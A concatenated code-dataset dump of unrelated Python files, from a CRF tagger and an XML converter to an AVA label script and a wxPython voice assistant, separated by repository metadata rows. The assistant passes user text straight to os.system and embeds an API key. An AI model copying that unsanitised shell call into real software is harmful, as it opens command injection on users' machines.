children.append(child_node)
# Set the current node in the dictionary as the current taxa.
current_node = child_node
# If we are at the end of the taxa make a specific one with size, name and childeren for options and add it to the dictionary.
else:
child_node = {'name':node_name, 'size':size, 'children':[]}
children.append(child_node)
return root
def main_parse_results(ref_file, blast_output, main_df):
"""Checks files and calls other functions.
Args:
ref_file: String of the path of the reference file.
blast_output: The data recieved from the blastn funtion.
main_df: The main dataframe.
Return:
main_df: The main dataframe.
"""
session_id = session['id']
try:
ref_dic = read_ref(ref_file)
main_df = read_output(ref_dic, blast_output, main_df)
return main_df
except FileNotFoundError:
with open('data/' + session_id + "errors.txt", 'w+') as file:
file.write("one of the files arn't pressent in the input folder")
except RecursionError:
with open('data/' + session_id + "errors.txt", 'w+') as file:
file.write("the reference set was invalid")
| true |
718ee71012dc7d2ed92d5c6079332738a6c05bcb | Python | gic-utfprmd/asr-study | /datasets/tatoeba.py | UTF-8 | 1,963 | 2.5625 | 3 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | from datasets import DatasetParser
import os
import librosa
import codecs
class Tatoeba(DatasetParser):
""" Tatoeba corpus dataset reader and parser
More about the dataset: https://voice.mozilla.org/data
"""
def __init__(self, dataset_dir=None, name='tatoeba', **kwargs):
dataset_dir = dataset_dir or 'data/tatoeba'
super(Tatoeba, self).__init__(dataset_dir, name, **kwargs)
def _iter(self):
csv_file = os.path.join(self.dataset_dir,'sentences_with_audio.csv')
for line in codecs.open(csv_file , 'r', encoding='utf8'):
try:
split = line.strip().split('\t')
#split = line.strip().split(' ')
#split[:] = [item for item in split if item != '']
#Ignore first line csv arquive.
if split[0] == 'id':
continue
audio_file = os.path.join(self.dataset_dir,'audio/'+split[1]+'/'+split[0]+'.mp3')
"""text = ''
for i in split[2:]:
text = text+i+' '"""
label = split[2].lower()
speaker_id = split[1]
try:
duration = librosa.audio.get_duration(filename=audio_file)
except IOError:
self._logger.error('File %s not found' % audio_file)
continue
yield {'duration': duration,
'input': audio_file,
'label': label,
'speaker': speaker_id}
except :
self._logger.error('Skipping Line: %s'% line)
def _report(self, dl):
report = '''General information:
Number of utterances: %d
Total size (in seconds) of utterances: %.f''' % (len(dl['speaker']), sum(dl['duration']))
return report
| true |
7a24e54f2a869e07102afff51170f138bf7195b8 | Python | Aasthaengg/IBMdataset | /Python_codes/p03111/s603093422.py | UTF-8 | 1,341 | 2.59375 | 3 | [] | no_license | import math,itertools,fractions,heapq,collections,bisect,sys,queue,copy
sys.setrecursionlimit(10**7)
inf=10**20
mod=10**9+7
dd=[(-1,0),(0,1),(1,0),(0,-1)]
ddn=[(-1,0),(-1,1),(0,1),(1,1),(1,0),(1,-1),(0,-1),(-1,-1)]
def LI(): return [int(x) for x in sys.stdin.readline().split()]
# def LF(): return [float(x) for x in sys.stdin.readline().split()]
def I(): return int(sys.stdin.readline())
def F(): return float(sys.stdin.readline())
def LS(): return sys.stdin.readline().split()
def S(): return input()
# def main():
# # main()
# print(main())
n,a,b,c=LI()
l=[I() for _ in range(n)]
answer=inf
def f(lst,ind):
global answer
if ind==n:
ac=lst.count(1)
bc=lst.count(2)
cc=lst.count(3)
if ac==0 or bc==0 or cc==0:
return min(answer,inf)
_a=_b=_c=0
for i,x in enumerate(lst):
if x==1:
_a+=l[i]
elif x==2:
_b+=l[i]
elif x==3:
_c+=l[i]
# 合わなかった原因。短縮できることを忘れてた
# if _a>a or _b>b or _c>c:
# return min(answer,inf)
sm=0
sm+=max(0,ac-1)*10
sm+=max(0,bc-1)*10
sm+=max(0,cc-1)*10
sm+=abs(a-_a)
sm+=abs(b-_b)
sm+=abs(c-_c)
return min(answer,sm)
else:
for i in range(4):
lst[ind]=i
answer=min(answer,f(lst,ind+1))
return answer
lst=[-1]*n
print(f(lst,0))
| true |
120f95f180f234d1df7efc8d591d0108f723f7ec | Python | Ch3shireDev/ANN | /old/sandbox3.py | UTF-8 | 1,061 | 2.90625 | 3 | [] | no_license | import numpy as np
from random import randint
N = 500
n = 8
x = np.array([0 for i in range(N)])
ex = []
for i in range(N):
e = [0 for _ in range(N)]
e[i] = 1
ex += [e]
def f(x):
X = None
if len(x.shape)>1:
X = np.outer(np.arange(1, N+1 ), np.ones(n+1))
else:
X = np.arange(1,N+1)
y = x - X + np.roll(x,1,axis=0)
return sum(y**2)
dx = 0.000001
for i in range(120):
tab = []
y0 = f(x)
grad = np.zeros_like(x).astype(np.float)
for k in range(len(ex)):
e = ex[k]
e = np.array(e).astype(np.float)
y = f(x+e*dx)
dy = y-y0
grad += e*dy/dx
grad /= np.linalg.norm(grad)
e = grad
xmin, xmax = -100000, 100000
x0 = x.copy()
for j in range(10):
lin = np.linspace(xmin, xmax, n+1)
X = x0.T + np.outer(lin, e)
y = f(X.T)
index = np.argmin(y)
x1 = lin[index]
dx = (xmax-xmin)/n
xmin, xmax = x1 - dx, x1 + dx
x = x0 + e*x1
print(i, y[index])
if y[index] < 5.1:
break
| true |
8e37765a46e8ea9c9cab0e0bff10f6a5425055f2 | Python | sbp/funs | /pad.py | UTF-8 | 78 | 2.59375 | 3 | [] | no_license | __all__ = ["pad"]
def pad(text, n, zero="0"):
return text.rjust(n, zero)
| true |
34fdeb25340ba5aa64353a17a30667347bb5f668 | Python | dyedefRa/python_bastan_sona_sadik_turan | /04_Python_Kosullar/01_if_else_bloglari.py | UTF-8 | 615 | 3.28125 | 3 | [] | no_license | '''
print('Hoş Geldiniz'.center(50,'/'))
if 3>2:
print("Merhaba")
isLoggedin = True
if isLoggedin:
print("Merhaba hoş geldiniz..")
'''
'''
username = 'sadikturan'
password = '1234'
isLoggedin = (username == 'sadikturann') and (password == '1234')
if isLoggedin:
print('Hoş Geldiniz')
else:
print('username ya da parola yanlış')
'''
username = 'sadikturan'
password = '1234'
if (username == 'sadikturan'):
if (password == '1234'):
print('Hoş Geldiniz')
else:
print("Parola bilginiz yanlış")
else:
print('username yanlış')
| true |
efae61eca200cb4547c403a4f97c0e8b9a944e47 | Python | nikhilhenry/Spark | /spark.py | UTF-8 | 4,203 | 2.953125 | 3 | [] | no_license | import wx
import wikipedia
import wolframalpha
import os
#Api stuff
app_id = "YPR8W2-2JJ5UWLW8G"#wolframalpha api key
client = wolframalpha.Client(app_id)#creating client for wikipedia
os.system("espeak Hey_I\'m_Spark")#fisrt statement on bootup
#UI declaration and intialization
class MyFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self, None,
pos=wx.DefaultPosition, size=wx.Size(450, 100),
style=wx.MINIMIZE_BOX | wx.SYSTEM_MENU | wx.CAPTION |
wx.CLOSE_BOX | wx.CLIP_CHILDREN,
title="PyDa")
panel = wx.Panel(self)
my_sizer = wx.BoxSizer(wx.VERTICAL)
lbl = wx.StaticText(panel,
label="Hello I am Spark the Python Digital Assistant. How can I help you?")
my_sizer.Add(lbl, 0, wx.ALL, 5)
self.txt = wx.TextCtrl(panel, style=wx.TE_PROCESS_ENTER,size=(400,30))
self.txt.SetFocus()
self.txt.Bind(wx.EVT_TEXT_ENTER, self.OnEnter)
my_sizer.Add(self.txt, 0, wx.ALL, 5)
panel.SetSizer(my_sizer)
self.Show()
#Getting query
def OnEnter(self, event):
input = self.txt.GetValue()
input = input.lower()#Changing to a lower case
#Fun stuff
if input == "who created you" or input == "who created you ?" or input == "who created you?" or input == "who made you" or input == "who made you ?" or input == "who made you?" :
print "I was created by a genius, 13 year old Nikhil Henry and 14 year old Abhinav Shenoy"
os.system("espeak I_was_created_by_a_genius,_13_year_old_Nikhil_Henry_and_14_year_old_Abhinav_Shenoy")
elif input == "who are you" or input == "what are you" or input == "who are you ?" or input == "what are you ?" or input == "what are you?" or input == "who are you?":
print "I'm Spark the python Digital Assistant"
os.system("espeak I\'m_Spark_the_python_Digital_Assistant")
elif input == "where were you made" or input == "where were you made ?" or input == "where were you created" or input == "where were you created ?" or input == "where were you made?" or input == "where were you created?":
print "I was created in Bangalore,India"
os.system("espeak I_was_created_in_Bangalore,India")
elif input == "whats your name" or input == "what's your name ?" or input == "what's your name?" or input == "whats your name?" or input == "whats your name ?":
print "My name is Python Digital Assistant but you can call me PyDa"
os.system("espeak My_name_is_Spark!")
elif input == "howdy":
print "howdy partner"
os.system("espeak howdy_partner")
elif input == "i love you" or input == "i love you Spark" or input == "I love you Spark" or input == "i love you spark":
print "I am a computer, I have no feelings"
os.system("espeak I_am_a_computer,_I_have_no_feelings")
elif input == "how are you" or input == "how are you?":
print "I am fine, how are you?"
os.system("espeak I_am_fine,_how_are_you?")
else:
try:
try:
if "open" in input:
input = input.split(' ')
input = ' '.join(input[1:])
os.system(input)
except:
#Fetching data
try:#from wolframalpha
res = client.query(input)
answer = next(res.results).text
print answer
except:
#from wikipedia
input = input.split(' ')
input = ' '.join(input[2:])
print wikipedia.summary(input)
os.system("espeak I found this article on wikipedia")
except:
print "Check your internet connection, error code 404"
#to keep runing
if __name__ == "__main__":
app = wx.App(True)
frame = MyFrame()
app.MainLoop() | true |
bcfbb4fc75d0c22c89287f4df050f7ac146f2121 | Python | gptcod/Semantic_Ext_Cybersecurity | /crf_training.py | UTF-8 | 11,782 | 2.5625 | 3 | [] | no_license | import feature_processing
import sklearn_crfsuite
from sklearn_crfsuite import scorers
from sklearn_crfsuite import metrics
from collections import Counter
class CRFTraining:
def __init__(self):
self.featureP = feature_processing.FeatureProcessing()
self.featureP.create_test_train_token_tables()
#self.featureP.read_token_files_into_tables()
self.train_table_word_attrs = self.featureP.train_table
self.test_table_word_attrs = self.featureP.test_table
#self.train_sentences_list = self.featureP.train_sentences # Not needed
self.crf_model = None
def word2features_train(self, i):
# Extract features from every word and convert word to a feature vector for CRF model
total_length = self.train_table_word_attrs.shape[0]
word_attrs = self.train_table_word_attrs[i][0].split()
word = word_attrs[0]
pos_tag = word_attrs[1]
# token_label = self.word_attribute_table[i][2]
features = {
'postag': pos_tag,
'postag[:2]': pos_tag[:2],
'word.lower()': word.lower(),
'word': word,
'word[-3:]': word[-3:],
'word[-2:]': word[-2:],
'word.isupper()': word.isupper(),
'word.istitle()': word.istitle(),
'word.isdigit()': word.isdigit()
}
if i != total_length - 1:
if i >= 1:
if self.train_table_word_attrs[i - 1] != '\n':
previous_word_attr = self.train_table_word_attrs[i - 1][0].split()
word_before = previous_word_attr[0]
features['word_unigram_before'] = word_before
features['-1:word.lower()'] = word_before.lower()
features['-1:word.istitle()'] = word_before.istitle()
features['-1:word.isupper()'] = word_before.isupper()
features['pos_unigram_before'] = previous_word_attr[1]
features['-1:postag[:2]']: previous_word_attr[1][:2]
if i >= 2:
if self.train_table_word_attrs[i - 1] != '\n' and self.train_table_word_attrs[i - 2] != '\n':
previous_word_attr_1 = self.train_table_word_attrs[i - 1][0].split()
previous_word_attr_2 = self.train_table_word_attrs[i - 2][0].split()
word_before_1 = previous_word_attr_1[0]
word_before_2 = previous_word_attr_2[0]
bigram_before = word_before_1 + " " + word_before_2
#bigram_before = word_before_2
features['word_bigram_before'] = bigram_before
features['-2:word.lower()'] = bigram_before.lower()
features['-2:word.istitle()'] = bigram_before.istitle()
features['-2:word.isupper()'] = bigram_before.isupper()
features['pos_bigram_before'] = previous_word_attr_1[1] + " " + previous_word_attr_2[1]
#features['pos_bigram_before'] = previous_word_attr_2[1]
#features['-2:postag[:2]']: previous_word_attr_2[1][:2]
features['-2:postag[:2]']: previous_word_attr_1[1][:2] + " " + previous_word_attr_2[1][:2]
if i <= total_length - 2:
if self.train_table_word_attrs[i + 1] != '\n':
next_word_attr = self.train_table_word_attrs[i + 1][0].split()
word_after = next_word_attr[0]
features['word_unigram_after'] = word_after
features['+1:word.lower()'] = word_after.lower()
features['+1:word.istitle()'] = word_after.istitle()
features['+1:word.isupper()'] = word_after.isupper()
features['pos_unigram_after'] = next_word_attr[1]
features['+1:postag[:2]']: next_word_attr[1][:2]
if i <= total_length - 3:
if self.train_table_word_attrs[i + 1] != '\n' and self.train_table_word_attrs[i + 2] != '\n':
next_word_attr_1 = self.train_table_word_attrs[i + 1][0].split()
next_word_attr_2 = self.train_table_word_attrs[i + 2][0].split()
word_after_1 = next_word_attr_1[0]
word_after_2 = next_word_attr_2[0]
bigram_after = word_after_1 + " " + word_after_2
#bigram_after = word_after_2
features['word_bigram_after'] = bigram_after
features['+2:word.lower()'] = bigram_after.lower()
features['+2:word.istitle()'] = bigram_after.istitle()
features['+2:word.isupper()'] = bigram_after.isupper()
features['pos_bigram_after'] = next_word_attr_1[1] + " " + next_word_attr_2[1]
#features['pos_bigram_after'] = next_word_attr_2[1]
#features['+2:postag[:2]']: next_word_attr_2[1][:2]
features['+2:postag[:2]']: next_word_attr_1[1][:2] + " " + next_word_attr_2[1][:2]
return features
def word2features_test(self, i):
# Extract features from every word and convert word to a feature vector for CRF model
total_length = self.test_table_word_attrs.shape[0]
word_attrs = self.test_table_word_attrs[i][0].split()
word = word_attrs[0]
pos_tag = word_attrs[1]
# token_label = self.word_attribute_table[i][2]
features = {
'postag': pos_tag,
'postag[:2]': pos_tag[:2],
'word.lower()': word.lower(),
'word': word,
'word[-3:]': word[-3:],
'word[-2:]': word[-2:],
'word.isupper()': word.isupper(),
'word.istitle()': word.istitle(),
'word.isdigit()': word.isdigit()
}
if i != total_length - 1:
if i >= 1:
if self.test_table_word_attrs[i - 1] != '\n':
previous_word_attr = self.test_table_word_attrs[i - 1][0].split()
word_before = previous_word_attr[0]
features['word_unigram_before'] = word_before
features['-1:word.lower()'] = word_before.lower()
features['-1:word.istitle()'] = word_before.istitle()
features['-1:word.isupper()'] = word_before.isupper()
features['pos_unigram_before'] = previous_word_attr[1]
features['-1:postag[:2]']: previous_word_attr[1][:2]
if i >= 2:
if self.test_table_word_attrs[i - 1] != '\n' and self.test_table_word_attrs[i - 2] != '\n':
previous_word_attr_1 = self.test_table_word_attrs[i - 1][0].split()
previous_word_attr_2 = self.test_table_word_attrs[i - 2][0].split()
word_before_1 = previous_word_attr_1[0]
word_before_2 = previous_word_attr_2[0]
bigram_before = word_before_1 + " " + word_before_2
#bigram_before = word_before_2
features['word_bigram_before'] = bigram_before
features['-2:word.lower()'] = bigram_before.lower()
features['-2:word.istitle()'] = bigram_before.istitle()
features['-2:word.isupper()'] = bigram_before.isupper()
features['pos_bigram_before'] = previous_word_attr_1[1] + " " + previous_word_attr_2[1]
#features['pos_bigram_before'] = previous_word_attr_2[1]
#features['-2:postag[:2]']: previous_word_attr_2[1][:2]
features['-2:postag[:2]']: previous_word_attr_1[1][:2] + " " + previous_word_attr_2[1][:2]
if i <= total_length - 2:
if self.test_table_word_attrs[i + 1] != '\n':
next_word_attr = self.test_table_word_attrs[i + 1][0].split()
word_after = next_word_attr[0]
features['word_unigram_after'] = word_after
features['+1:word.lower()'] = word_after.lower()
features['+1:word.istitle()'] = word_after.istitle()
features['+1:word.isupper()'] = word_after.isupper()
features['pos_unigram_after'] = next_word_attr[1]
features['+1:postag[:2]']: next_word_attr[1][:2]
if i <= total_length - 3:
if self.test_table_word_attrs[i + 1] != '\n' and self.test_table_word_attrs[i + 2] != '\n':
next_word_attr_1 = self.test_table_word_attrs[i + 1][0].split()
next_word_attr_2 = self.test_table_word_attrs[i + 2][0].split()
word_after_1 = next_word_attr_1[0]
word_after_2 = next_word_attr_2[0]
bigram_after = word_after_1 + " " + word_after_2
#bigram_after = word_after_2
features['word_bigram_after'] = bigram_after
features['+2:word.lower()'] = bigram_after.lower()
features['+2:word.istitle()'] = bigram_after.istitle()
features['+2:word.isupper()'] = bigram_after.isupper()
features['pos_bigram_after'] = next_word_attr_1[1] + " " + next_word_attr_2[1]
#features['pos_bigram_after'] = next_word_attr_2[1]
#features['+2:postag[:2]']: next_word_attr_2[1][:2]
features['+2:postag[:2]']: next_word_attr_1[1][:2] + " " + next_word_attr_2[1][:2]
return features
def create_x_train(self):
x_train = []
#for i, word_attr in enumerate(self.train_table_word_attrs):
for i in range(self.train_table_word_attrs.shape[0]):
if self.train_table_word_attrs[i] != '\n':
x_train.append(self.word2features_train(i))
return x_train
def create_y_label_for_train(self):
y_label = []
for i, word_attr in enumerate(self.train_table_word_attrs):
if word_attr != '\n':
y_label.append(word_attr[0].split()[2])
return y_label
def create_x_test(self):
x_test = []
for i in range(self.test_table_word_attrs.shape[0]):
if self.test_table_word_attrs[i] != '\n':
x_test.append(self.word2features_test(i))
return x_test
def create_y_label_for_test(self):
y_label_test = []
for i, word_attr in enumerate(self.test_table_word_attrs):
if word_attr != '\n':
y_label_test.append(word_attr[0].split()[2])
return y_label_test
def train_crf(self):
x_train = [self.create_x_train()]
y_train = [self.create_y_label_for_train()]
self.crf_model = sklearn_crfsuite.CRF(
algorithm='lbfgs',
c1=0.1,
c2=0.1,
max_iterations=1000,
all_possible_transitions=True
)
self.crf_model.fit(x_train, y_train)
def test_crf(self):
x_test = [self.create_x_test()]
y_test = [self.create_y_label_for_test()]
labels = list(self.crf_model.classes_)
#labels.remove('O')
y_pred = self.crf_model.predict(x_test)
print(metrics.flat_f1_score(y_test, y_pred, average='weighted', labels = labels))
sorted_labels = sorted(
labels,
key=lambda name: (name[1:], name[0])
)
print(metrics.flat_classification_report(
y_test, y_pred, labels=sorted_labels, digits=3
))
#metrics.flat_f1_score(y_test, y_pred, average='weighted', labels = labels)
crf_obj = CRFTraining()
crf_obj.train_crf()
crf_obj.test_crf()
| true |
8f11d20f43a66d447cf1405066c27fb8cc9ddcf9 | Python | roshandafal98/parsing_xml_data | /evaluation_xml.py | UTF-8 | 455 | 2.90625 | 3 | [] | no_license | import json
from xmltodict import xmltodict
with open("xml_data.xml") as xml_file:
data_dict = xmltodict.parse(xml_file.read())
xml_file.close()
# generate the object using json.dumps()
# corresponding to json data
json_data = json.dumps(data_dict)
# Write the json data to output
# json file
with open("data.json", "w") as json_file:
json_file.write(json_data)
json_file.close()
| true |
b13486ce139094af0ea7692cf24f9c5eba0d5f21 | Python | opf-labs/AQuA | /aqEudoraMboxAnalysis/TOCAnalysis/eudora_toc_analysis.py | UTF-8 | 1,383 | 2.640625 | 3 | [
"Apache-2.0"
] | permissive | import sys
import binascii
#length (bytes) of structure components
header = 72
footer = 32
msg_len = 218
#length (bytes) entry components
unknown = 50
timestamp = 32
sender = 64
subject = 64
remainder = 8
total = 218
f = open(sys.argv[1], 'rb')
fsummary = open(sys.argv[1].replace('.toc', '_toc_summary.txt'), 'wb')
#return the number of emails this toc indexes
def getMboxSize(toc):
toc.seek(0,2)
return (toc.tell() - header - footer) / 218
#return the name of the mbox this toc indexes
def getMboxName(toc):
toc.seek(8)
return toc.read(32)
attachment_count = 0
len = getMboxSize(f)
f.seek(header)
for x in range (len):
mail = f.read(218)
field_unknown = mail[0:49].replace('\x00', ' ')
field_timestamp = mail[50:81].replace('\x00', ' ')
field_from = mail[82:145].replace('\x00', ' ')
field_subject = mail[146:209].replace('\x00', ' ')
summary = str(x+1).center(5, ' ') + ' | ' + field_timestamp.rstrip().center(32, ' ') + ' | ' + field_from + ' | ' + field_subject
fsummary.write(summary + '\n')
if (ord(field_unknown[47]) & 0x80) == 0x80:
attachment_count += 1
fsummary.write('\n') #will just print a single line
fsummary.write('Mbox name: ' + getMboxName(f).replace('\x00', ' ') + '\n')
fsummary.write('Mbox size: ' + str(len) + '\n')
fsummary.write('Est. No. emails with attachments: ' + str(attachment_count) + '\n')
f.close()
fsummary.close()
| true |
6c1ccc92d79cb4e7ce01b52e822740dd2e6cdf0a | Python | VignoliniLab/2D-Structure-Designer | /powertools.py | UTF-8 | 2,912 | 2.6875 | 3 | [] | no_license | from __future__ import division
import subprocess
import shutil
import time
import sys
import os
def outputFolder(RESDIR,force=False,logfile='log.out'):
if RESDIR[-1] != "/":
RESDIR += "/"
if os.path.exists(RESDIR):
if not force:
try:
#Python 2
ans = raw_input("The dir " + RESDIR + " already exists, continue? (y/n)")
except NameError:
#Python 3
ans = input("The dir " + RESDIR + " already exists, continue? (y/n)")
if not ans=='y':
exit("Quitting instead of overwriting")
else:
os.makedirs(RESDIR)
print("Resultdir is: " + RESDIR)
shutil.copyfile(os.path.abspath(sys.argv[0]),RESDIR+sys.argv[0])
tee = subprocess.Popen(['tee', '%s/%s' % (RESDIR, logfile)],
stdin=subprocess.PIPE)
sys.stdout.flush()
os.dup2(tee.stdin.fileno(), sys.stdout.fileno())
sys.stderr.flush()
os.dup2(tee.stdin.fileno(), sys.stderr.fileno())
return RESDIR
#_ittime = pl.zeros(2) #First entry is updater per printIterTime, second per printSubTime
def printIterTime():
tic = time.time()
if not _ittime[0] == 0.:
print("Iteration time: {:.2f}s".format(tic-_ittime[0]))
_ittime[0]=tic
_ittime[1]=tic
#To be used "within" printIterTime
def printSubTime(description):
tic = time.time()
if not _ittime[1] == 0.:
print(description + " time: {:.2f}s".format(tic-_ittime[1]))
_ittime[1]=tic
#_subtimestring = [""]
def gatherSubTime(description):
tic = time.time()
if not _ittime[1] == 0.:
_subtimestring[0] += description + " time: {:.2f}s\n".format(tic-_ittime[1])
_ittime[1]=tic
def printGatheredTimes():
print(_subtimestring[0])
_subtimestring[0] = ""
##
#
# A dictionary class with a couple of extra features:
# * If an unindexed entry is accessed an empty list is returned,
# which means that commands like
# DH["myVar"] += [2]
# does not require initialisation of DH["myVar"]. This is convenient
# for looping
#
# * entries created using const() are accessed as an attribute. For example
# DH.const("myVar",2)
# print DH.myVar
class dataHandler(dict):
def __init__(self, *args, **kwargs):
super(dataHandler,self).__init__(*args,**kwargs)
self._const = []
def __getitem__(self,key):
if self.has_key(key):
return super(dataHandler,self).__getitem__(key)
else:
self[key] = []
return self[key]
def const(self,key,val):
if not key in dir(self):
self._const += [key]
setattr(dataHandler,key,val)
else:
print("dataHandler: name '{:s}' is already in use".format(key))
def consts(self,dic):
for key in dic:
self.const(key,dic[key])
def dump(self,PATH):
f = open(PATH,'w')
for key in self._const:
data = getattr(dataHandler,key)
f.write("{:s} !{:s} !{:s} !{:s}\n".format(key.ljust(15),data.__str__().ljust(15),type(key),type(data)))
f.close()
if __name__ == "__main__":
a = dataHandler()
a.const("it",5)
a.consts({"it" :5,
"it2" :3})
print(a.it)
print(a.it2)
a["ab"] += [2]
print(a["ab"])
| true |
ab79576118ad6be79f9f7b16e5e08477814fe880 | Python | jykim256/Project-Euler | /002.py | UTF-8 | 159 | 3.28125 | 3 | [] | no_license | arr = [0,1]
a = arr[-1]
b = arr[-2]
while a < 4000000:
arr.append(a + b)
a = arr[-1]
b = arr[-2]
sum = 0
for i in arr:
if i % 2 == 0:
sum += i
print(sum) | true |
5f273ff81536fcf635a4ea6f36d732646a3a9c9c | Python | abandonsea/deepinsight-iqa | /deepinsight_iqa/data_pipeline/nima_gen/schema/AVA/get_labels.py | UTF-8 | 3,849 | 2.796875 | 3 | [
"Apache-2.0"
] | permissive | import json
import argparse
import numpy as np
import pandas as pd
from maxentropy.skmaxent import MinDivergenceModel
import logging
import glob2
import os
logger = logging.getLogger(__name__)
CHOICES = ["mos_to_prob", "prob_to_mos"]
def normalize_labels(labels):
labels_np = np.array(labels)
return labels_np / labels_np.sum()
def calc_mean_score(score_dist):
# Expectation
score_dist = normalize_labels(score_dist)
return (score_dist * np.arange(1, 11)).sum()
def load_json(file_path):
with open(file_path, 'r') as f:
return json.load(f)
def save_json(data, target_file, prefix=""):
with open(f"{prefix}_{target_file}", 'w') as f:
json.dump(data, f, indent=2, sort_keys=True)
# the maximised distribution must satisfy the mean for each sample
def get_features():
def f0(x):
return x
return [f0]
def get_max_entropy_distribution(mean: pd.Series):
SAMPLESPACE = np.arange(10)
features = get_features()
model = MinDivergenceModel(features, samplespace=SAMPLESPACE, algorithm='CG')
# set the desired feature expectations and fit the model
X = np.array([[mean]])
model.fit(X)
return model.probdist()
def get_dataframe(mean_raw_file):
df = pd.read_csv(mean_raw_file, skiprows=0, header=None, sep=' ')
df.columns = ['distorted_path', 'reference_path', 'mos']
return df
def parse_raw_data(df):
samples = []
for i, row in df.iterrows():
max_entropy_dist = get_max_entropy_distribution(row['mos'])
samples.append({'image_id': row['distorted_path'].split('.')[0], 'label': max_entropy_dist.tolist()})
# split data into test and train set
indices = np.random.shuffle(np.arange(len(samples)))
train_size = len(indices) * 0.7
train_samples = [samples[x] for x in indices[:train_size]]
test_samples = [samples[x] for x in indices[train_size:]]
return train_samples, test_samples
def mos_to_prob(source_file, target_file):
""" Calculate probability dist from MOS and save to json
"""
df = get_dataframe(source_file)
train_samples, test_samples = parse_raw_data(df)
for sample, filename in [(train_samples, "train.json"), (test_samples, "test.json")]:
save_json(sample, filename, prefix=target_file)
logger.info(f'Done! Saved JSON at {target_file}')
def prob_to_mos(src_path, target_file):
""" Merge/Convert json file to single CSV
Arguments:
args {[type]} -- [description]
"""
ava_labels = []
for filename in glob2.glob(os.path.join(src_path, "*.json")):
ava_labels = +[{"image_id": row['image_id'], "label": calc_mean_score(row['label'])}
for row in load_json(filename).items()]
df = pd.DataFrame.from_dict(ava_labels)
df = df.iloc[np.random.permutation(len(df))]
df.columns = ["image_id", "label"]
df.to_csv(target_file)
logger.info(f'Done! Saved CSV at {target_file} location')
def _parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--conversion_type", choices=CHOICES, required=True,
help="Convert mos to probability distribution and vice-versa.")
parser.add_argument('-sf', '--source-path', required=True,
help='csv/json file path of raw mos_with_names file')
parser.add_argument('-tf', '--target-path', required=True,
help='file path of json/csv labels file to be saved')
return parser.parse_args()
def _cli():
args = _parse_arguments()
if args.conversion_type == "mos_to_prob":
mos_to_prob(args.source_path, args.target_path)
elif args.conversion_type == "prob_to_mos":
prob_to_mos(args.source_path, args.target_path)
else:
raise ValueError("Invalid choices args")
if __name__ == '__main__':
_cli()
| true |
c26c7437e41a02f88566f7c0131ca732d9f5723b | Python | hitallocavas/information-retrieval-classifier | /process_data.py | UTF-8 | 5,679 | 2.921875 | 3 | [] | no_license | import os
import json
import nltk, re, pprint
from bs4 import BeautifulSoup
import time
import datetime
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import BernoulliNB
from sklearn.tree import DecisionTreeClassifier
from sklearn import svm
from sklearn.linear_model import LogisticRegression
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.metrics import f1_score
nltk.download('punkt')
from nltk import word_tokenize
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
stemmer = PorterStemmer()
texts = []
statuses = []
def process():
directory = 'data'
for file in os.listdir(directory):
with open(directory + '/' + file, encoding='utf-8') as json_file:
json_array = json.load(json_file)
for page in json_array:
text = process_text(page['content'])
texts.append(text)
statuses.append(1 if page['status'] == 'True' else 0)
def process_text(text):
# Removendo Tags e conteúdos do HTML
soup = BeautifulSoup(text)
text = soup.get_text()
# Removendo todos os caracteres desnecessários
text = re.sub('[^A-Za-z]', ' ', text)
# Padronizando Case
text = text.lower()
# Tokenizando texto
tokens = word_tokenize(text)
# Removendo Stopwords
for word in tokens:
if word in stopwords.words('english'):
tokens.remove(word)
# Realizando Stemming
for i in range(len(tokens)):
tokens[i] = stemmer.stem(tokens[i])
return ' '.join(tokens)
def bag_of_words():
matrix = CountVectorizer(max_features=1000)
X = matrix.fit_transform(texts).toarray()
return train_test_split(X, statuses)
def naive_bayes(X_train, X_test, y_train, y_test):
classifier = BernoulliNB()
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
print_metrics(y_pred, y_test, 'Naive Bayes')
def support_vector_machine(X_train, X_test, y_train, y_test):
classifier = svm.SVC(kernel='linear') # Linear Kernel
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
print_metrics(y_pred, y_test, 'Support Vector Machine')
def decision_trees(X_train, X_test, y_train, y_test):
classifier = DecisionTreeClassifier()
classifier = classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
print_metrics(y_pred, y_test, 'Decision Trees (JV8)')
def logistic_regression(X_train, X_test, y_train, y_test):
classifier = LogisticRegression(solver='lbfgs', max_iter=10000)
classifier = classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
print_metrics(y_pred, y_test, 'Logistic Regression')
def multilayer_perceptron(X_train, X_test, y_train, y_test):
classifier = MLPClassifier(random_state=1, max_iter=300).fit(X_train, y_train)
classifier = classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
print_metrics(y_pred, y_test, 'MultiLayer Perceptron')
def print_metrics(y_pred, y_test, classification_method):
accuracy = accuracy_score(y_test, y_pred)
precision = precision_score(y_test, y_pred)
recall = recall_score(y_test, y_pred)
print("################################## " + classification_method + " ##################################")
print('Accuracy: ' + str(accuracy))
print('Precision: ' + str(precision))
print('Recall: ' + str(recall))
def run_naive_bayes( X_train, X_test, y_train, y_test):
first_time = datetime.datetime.now()
naive_bayes(X_train, X_test, y_train, y_test)
later_time = datetime.datetime.now()
difference = later_time - first_time
print('Tempo Naive Bayes: ' + str(difference.microseconds) + ' segundos')
def run_decision_three( X_train, X_test, y_train, y_test):
first_time = datetime.datetime.now()
decision_trees(X_train, X_test, y_train, y_test)
later_time = datetime.datetime.now()
difference = later_time - first_time
print('Tempo Arvore de Decisão: ' + str(difference.microseconds) + ' segundos')
def run_svm( X_train, X_test, y_train, y_test):
first_time = datetime.datetime.now()
support_vector_machine(X_train, X_test, y_train, y_test)
later_time = datetime.datetime.now()
difference = later_time - first_time
print('Tempo SVM: ' + str(difference.microseconds) + ' segundos')
def run_multi_layer_perceptron( X_train, X_test, y_train, y_test):
first_time = datetime.datetime.now()
multilayer_perceptron(X_train, X_test, y_train, y_test)
later_time = datetime.datetime.now()
difference = later_time - first_time
print('Tempo MultiLayerPerceptron: ' + str(difference.microseconds) + ' segundos')
